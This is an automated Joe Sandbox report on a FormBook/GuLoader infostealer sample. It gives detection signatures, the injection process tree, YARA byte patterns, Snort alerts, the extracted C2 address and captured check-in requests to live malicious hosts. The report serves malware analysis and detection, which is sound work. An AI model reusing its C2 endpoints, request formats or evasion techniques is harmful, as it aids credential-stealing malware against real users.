Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Jjfmcz1Hsz.exe

Overview

General Information

Sample Name:Jjfmcz1Hsz.exe
Analysis ID:760810
MD5:f4cad3f0195d098ced41c4926a5695c2
SHA1:3fb8e89ac063889b73d65e66fff6760100d59d15
SHA256:72abd0b67059b670e94fb0b2397e3b4334d0effbab4a1dc1a659780eacce4984
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Jjfmcz1Hsz.exe (PID: 2548 cmdline: C:\Users\user\Desktop\Jjfmcz1Hsz.exe MD5: F4CAD3F0195D098CED41C4926A5695C2)
    • Jjfmcz1Hsz.exe (PID: 2000 cmdline: C:\Users\user\Desktop\Jjfmcz1Hsz.exe MD5: F4CAD3F0195D098CED41C4926A5695C2)
      • RAVCpl64.exe (PID: 7608 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • help.exe (PID: 3568 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • explorer.exe (PID: 4696 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • firefox.exe (PID: 8880 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
{"C2 list": ["www.xiaoxiuzhen.com/nqhc/"]}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0d9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac51:$sqlite3step: 68 34 1C 7B E1
    • 0x1a11b:$sqlite3text: 68 38 2A 90 C5
    • 0x1ac96:$sqlite3text: 68 38 2A 90 C5
    • 0x1a132:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acac:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddd7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.1200754284.000000000072B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      Click to see the 28 entries
      No Sigma rule has matched
      Timestamp:192.168.11.20103.63.2.17549870802031412 12/05/22-15:16:29.824802
      SID:2031412
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949883802031453 12/05/22-15:17:12.752525
      SID:2031453
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549870802031453 12/05/22-15:16:29.824802
      SID:2031453
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749850802031449 12/05/22-15:15:32.371812
      SID:2031449
      Source Port:49850
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749912802031453 12/05/22-15:18:48.078621
      SID:2031453
      Source Port:49912
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949883802031412 12/05/22-15:17:12.752525
      SID:2031412
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549938802031449 12/05/22-15:19:44.781098
      SID:2031449
      Source Port:49938
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.163234532014169 12/05/22-15:15:00.577362
      SID:2014169
      Source Port:63234
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.20192.185.32.15749912802031449 12/05/22-15:18:48.078621
      SID:2031449
      Source Port:49912
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949879802031449 12/05/22-15:17:01.537708
      SID:2031449
      Source Port:49879
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449840802031449 12/05/22-15:15:06.993468
      SID:2031449
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549870802031449 12/05/22-15:16:29.824802
      SID:2031449
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449904802031453 12/05/22-15:18:23.919550
      SID:2031453
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749850802031453 12/05/22-15:15:32.371812
      SID:2031453
      Source Port:49850
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449904802031412 12/05/22-15:18:23.919550
      SID:2031412
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749850802031412 12/05/22-15:15:32.371812
      SID:2031412
      Source Port:49850
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549938802031453 12/05/22-15:19:44.781098
      SID:2031453
      Source Port:49938
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949883802031449 12/05/22-15:17:12.752525
      SID:2031449
      Source Port:49883
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449840802031412 12/05/22-15:15:06.993468
      SID:2031412
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749912802031412 12/05/22-15:18:48.078621
      SID:2031412
      Source Port:49912
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549938802031412 12/05/22-15:19:44.781098
      SID:2031412
      Source Port:49938
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449840802031453 12/05/22-15:15:06.993468
      SID:2031453
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449904802031449 12/05/22-15:18:23.919550
      SID:2031449
      Source Port:49904
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949879802031453 12/05/22-15:17:01.537708
      SID:2031453
      Source Port:49879
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949879802031412 12/05/22-15:17:01.537708
      SID:2031412
      Source Port:49879
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Jjfmcz1Hsz.exeVirustotal: Detection: 46%Perma Link
      Source: Jjfmcz1Hsz.exeReversingLabs: Detection: 37%
      Source: Yara matchFile source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: http://www.botbillionsblaze.website/nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IXAvira URL Cloud: Label: malware
      Source: http://www.searchbot.su/nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IXAvira URL Cloud: Label: malware
      Source: http://www.botbillionsblaze.website/nqhc/Avira URL Cloud: Label: malware
      Source: 30.2.firefox.exe.28e93814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 30.0.firefox.exe.28e93814.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 30.0.firefox.exe.28e93814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 29.0.explorer.exe.13e83814.2.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 19.2.help.exe.34b0910.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 29.0.explorer.exe.13e83814.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 19.2.help.exe.3c73814.4.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 29.0.explorer.exe.13e83814.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.xiaoxiuzhen.com/nqhc/"]}
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F44640 CryptUnprotectData,19_2_02F44640
      Source: Jjfmcz1Hsz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\StrikketjetJump to behavior
      Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.11.20:49821 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49823 version: TLS 1.2
      Source: Jjfmcz1Hsz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Jjfmcz1Hsz.exe, 0000000B.00000003.1178049479.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1184340741.000000001D64B000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1322964721.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1327471330.000000000375C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Jjfmcz1Hsz.exe, Jjfmcz1Hsz.exe, 0000000B.00000003.1178049479.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000003.1184340741.000000001D64B000.00000004.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1322964721.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1327471330.000000000375C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: help.pdbGCTL source: Jjfmcz1Hsz.exe, 0000000B.00000002.1325746962.0000000001883000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1323580862.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: help.pdb source: Jjfmcz1Hsz.exe, 0000000B.00000002.1325746962.0000000001883000.00000004.00000020.00020000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1323580862.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Jjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1994520363.0000000008428000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00405FFD FindFirstFileA,FindClose,2_2_00405FFD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_0040559B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00402688 FindFirstFileA,2_2_00402688
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02F42C80 FindFirstFileW,FindNextFileW,FindClose,19_2_02F42C80
      Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi19_2_02F38880
      Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi19_2_02F3887F

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 154.204.24.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.185.32.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.245.148.189 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.232.217.125 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.63.111 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.91.8.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.151.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.15.214 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.24 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.101.158.239 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.212 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 50.87.192.144 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.63.2.175 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.24.68.23 80Jump to behavior
      Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.11.20:63234 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49850 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49850 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49850 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49870 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49879 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49879 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49879 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49883 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49904 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49912 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49912 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49912 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49938 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49938 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49938 -> 103.63.2.175:80
      Source: Malware configuration extractorURLs: www.xiaoxiuzhen.com/nqhc/
      Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IX HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX HTTP/1.1Host: www.apidachicago.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&t0D=yFNHS0IX HTTP/1.1Host: www.funknive.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&t0D=yFNHS0IX HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&t0D=yFNHS0IX HTTP/1.1Host: www.phootka.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&t0D=yFNHS0IX HTTP/1.1Host: www.wellnessprodia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IX HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
